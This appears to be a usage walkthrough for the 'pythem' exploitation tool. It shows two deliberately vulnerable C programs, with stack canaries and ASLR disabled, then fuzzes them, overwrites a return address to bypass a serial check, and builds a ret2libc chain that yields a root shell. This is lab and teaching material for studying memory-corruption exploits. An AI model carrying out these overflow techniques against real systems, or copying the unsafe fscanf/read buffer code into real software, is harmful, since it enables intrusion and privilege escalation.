//Code from "Shellcoder's Handbook: Discovering and Exploiting Security Holes" //Disable Canaries, Compile: gcc serial.c -fno-stack-protector -o serial //Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space #include <stdlib.h> #include <stdio.h> #include <string.h> int valid_serial(char *psz){	size_t len = strlen(psz);	unsigned total = 0;	size_t i;	if (len < 10)	return 0;	for(i = 0; i < len ; i++){	if ((psz[i] < '0') || (psz[i] > 'z' ))	return 0;	total += psz[i];	}	if (total % 853 == 83)	return 1;	return 0; } int validate_serial(){	char serial[24];	fscanf(stdin, "%s", serial);	if (valid_serial(serial))	return 1;	else	return 0; } int do_valid_stuff(){	printf("The serial number is valid!\n");	// do serial-restricted, valid stuff here.	exit(0); } int do_invalid_stuff(){	printf("Invalid serial number!\nExiting\n");	exit(1); } int main(int argc, char *argv[] ){	if(validate_serial())	do_valid_stuff();	else	do_invalid_stuff();	return 0; } 

 pythem> echo 0 > /proc/sys/kernel/randomize_va_space pythem> gcc serial.c -fno-stack-protector -o serial pythem> ./serial 123456 Invalid serial number! Exiting pythem> set file ./serial pythem> xploit stdin xploit> disas main Dump of assembler code for function main: ... callq 0x400723 <do_valid_stuff> (Function that only authenticated person has access.) ... xploit> fuzz ... [*] Sending buffer with lenght: 39 [*] Child program exited with code 1 [*] Hit enter to continue. [*] Sending buffer with lenght: 40 [*] Sending buffer with lenght: 41 [*] Child program crashed with SIGSEGV code: -11 ^C xploit> set arch x64 xploit> set offset [+] Enter the offset (number of 'A's): 40 xploit> set addr1 [+] First address to overwrite: 0x400723 xploit> xploit [+] Writing payload into buffer.txt [*] Sending buffer with lenght: 58 The serial number is valid! Exiting 

// Disable Canaries, Compile: gcc -fno-stack-protector vuln.c -o vuln // Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space #include <stdio.h> #include <unistd.h> int vuln() { char buf[40]; int r; r = read(0, buf, 200); printf("\nRead %d bytes. buf is %s\n", r, buf); return 0; } int main(int argc, char *argv[]) { printf("Try to sh"); vuln(); return 0; } 

 pythem> echo 0 > /proc/sys/kernel/randomize_va_space pythem> gcc vuln.c -fno-stack-protector -o vuln pythem> set file ./vuln pythem> xploit stdin xploit> set arch x64 xploit> fuzz ... [*] Sending buffer with lenght: 48 ... [*] Child program exited with code: 0 [*] Hit enter to continue. [*] Sending buffer with lenght: 49 ... [*] Child program crashed with SIGSEGV code: -11 ... [+] Sending buffer with lenght: 55 ... [+] Instruction Pointer may be near: 55 [*] Child program crashed with code: -7 ... [*] Sending buffer with lenght: 58 ... [*] Child program crashed with SIGSEGV code: -11 ^C 

 xploit> set offset 56 xploit> search instructions [+] Find: % rdi ... [INFO] File: ./vuln 0x0000000000400613: pop rdi; ret; xploit> set addr1 [+] First address to overwrite: 0x0000000000400613 xploit> find "/bin/sh" ... Found 1 results, display max 1 items: libc : 0x7ffff7b9c598 --> 0x68732f6e69622f ('/bin/sh') xploit> set addr2 [+] Second address to overwrite: 0x7ffff7b9c598 xploit> p system ... $1 = {<text variable, no debug info>} 0x7ffff7a76710 <__libc_system> xploit> set shellcode [+] Enter the shellcode: 0x7ffff7a76710 xploit> xploit [+] Writing payload into buffer.txt [*] Sending buffer with lenght: 98 ... [!] If it does not work automatically, run on terminal: (cat buffer.txt ; cat) | ./vuln xploit> exit pythem> exit # (cat buffer.txt; cat) | ./vuln Try to bash Read 98 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb id uid=0(root) gid=0(root) groups=0(root) whoami root